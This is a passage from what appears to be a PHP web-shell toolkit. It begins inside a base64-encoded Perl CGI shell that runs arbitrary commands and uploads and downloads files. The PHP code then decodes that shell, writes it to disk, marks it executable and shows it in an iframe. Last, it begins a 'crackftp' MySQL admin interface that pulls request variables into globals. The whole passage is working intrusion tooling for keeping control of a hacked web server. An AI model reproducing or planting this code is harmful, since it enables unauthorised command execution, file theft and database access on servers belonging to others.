MtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQgZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0Kew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPg0KT3ZlcndyaXRlIGlmIGl0IEV4aXN0czxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvDQojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMNCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIENvbW1hbmRUaW1lb3V0DQp7DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCQlwcmludCA8PEVORDsNCjwveG1wPg0KPGNvZGU+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuDQo8YnI+S2lsbGVkIGl0IQ0KPGNvZGU+DQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCQ0KCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJE9sZERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRPbGREaXJdXCQgIjsNCgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+IjsNCgl9DQoJZWxzZSAjIHNvbWUgb3RoZXIgY29tbWFuZCwgZGlzcGxheSB0aGUgb3V0cHV0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCQlwcmludCAiPGNvZGU+JFByb21wdCAkUnVuQ29tbWFuZDwvY29kZT48eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5kVGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAiIHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFuZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRfXG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdpbk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUgc3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMgZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludERvd25sb2FkTGlua1BhZ2UNCnsNCglsb2NhbCgkRmlsZVVybCkgPSBAXzsNCglpZigtZSAkRmlsZVVybCkgIyBpZiB0aGUgZmlsZSBleGlzdHMNCgl7DQoJCSMgZW5jb2RlIHRoZSBmaWxlIGxpbmsgc28gd2UgY2FuIHNlbmQgaXQgdG8gdGhlIGJyb3dzZXINCgkJJEZpbGVVcmwgPX4gcy8oW15hLXpBLVowLTldKS8nJScudW5wYWNrKCJIKiIsJDEpL2VnOw0KCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7DQoJCSRIdG1sTWV0YUhlYWRlciA9ICI8bWV0YSBIVFRQLUVRVUlWPVwiUmVmcmVzaFwiIENPTlRFTlQ9XCIxOyBVUkw9JERvd25sb2FkTGlua1wiPiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NClNlbmRpbmcgRmlsZSAkVHJhbnNmZXJGaWxlLi4uPGJyPg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4NCjwvY29kZT4NCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiPGNvZGU+RmFpbGVkIHRvIGRvd25sb2FkICRGaWxlVXJsOiAkITwvY29kZT4iOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIHJlYWRzIHRoZSBzcGVjaWZpZWQgZmlsZSBmcm9tIHRoZSBkaXNrIGFuZCBzZW5kcyBpdCB0byB0aGUNCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4NCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIHNlbnQuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglsb2NhbCgkU2VuZEZpbGUpID0gQF87DQoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZw0KCXsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQliaW5tb2RlKFNFTkRGSUxFKTsNCgkJCWJpbm1vZGUoU1RET1VUKTsNCgkJfQ0KCQkkRmlsZVNpemUgPSAoc3RhdCgkU2VuZEZpbGUpKVs3XTsNCgkJKCRGaWxlbmFtZSA9ICRTZW5kRmlsZSkgPX4gIG0hKFteL15cXF0qKSQhOw0KCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7DQoJCXByaW50ICJDb250ZW50LUxlbmd0aDogJEZpbGVTaXplXG4iOw0KCQlwcmludCAiQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9JDFcblxuIjsNCgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7DQoJCWNsb3NlKFNFTkRGSUxFKTsNCgl9DQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJcHJpbnQgIjxjb2RlPlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiPC9jb2RlPiI7DQoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlkZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWluIFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQp9DQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQNCnsNCgkmRXhlY3V0ZUNvbW1hbmQ7DQp9DQplbHNpZigkQWN0aW9uIGVxICJ1cGxvYWQiKSAjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQ0Kew0KCSZVcGxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAjIHVzZXIgd2FudHMgdG8gZG93bmxvYWQgYSBmaWxlDQp7DQoJJkRvd25sb2FkRmlsZTsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQNCnsNCgkmUGVyZm9ybUxvZ291dDsNCn0K‘;
$files = fopen("perl.dam" ,"w+");
$write = fwrite ($files ,base64_decode($perlshell));
fclose($files);
chmod("perl.dam",0755);
echo "<iframe src=perl/perl.dam width=100% height=100% frameborder=0></iframe> ";
}
elseif ($action == ‚mysql_1‘) {
@chdir(‚damane‘);
$crackftp = ‚<?
if ( function_exists('ini_get') ) {
	$onoff = ini_get('register_globals');
} else {
	$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
	@extract($HTTP_SERVER_VARS, EXTR_SKIP);
	@extract($HTTP_COOKIE_VARS, EXTR_SKIP);
	@extract($HTTP_POST_FILES, EXTR_SKIP);
	@extract($HTTP_POST_VARS, EXTR_SKIP);
	@extract($HTTP_GET_VARS, EXTR_SKIP);
	@extract($HTTP_ENV_VARS, EXTR_SKIP);
}

function logon() {
	global $PHP_SELF;
	setcookie( "mysql_web_admin_username" );
	setcookie( "mysql_web_admin_password" );
	setcookie( "mysql_web_admin_hostname" );
	echo "<table width=100% height=100%><tr><td><center>\n";
	echo "<table cellpadding=2><tr><td><center>\n";
	echo "<table cellpadding=20><tr><td><center>\n";
	echo "<h1>MySQL Interface (Developed By Mohajer22)</h1>\n";
	echo "<form action='$PHP_SELF'>\n";
	echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
	echo "<table cellpadding=5 cellspacing=1>\n";
	echo "<tr><td>Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
	echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n";
	echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n";
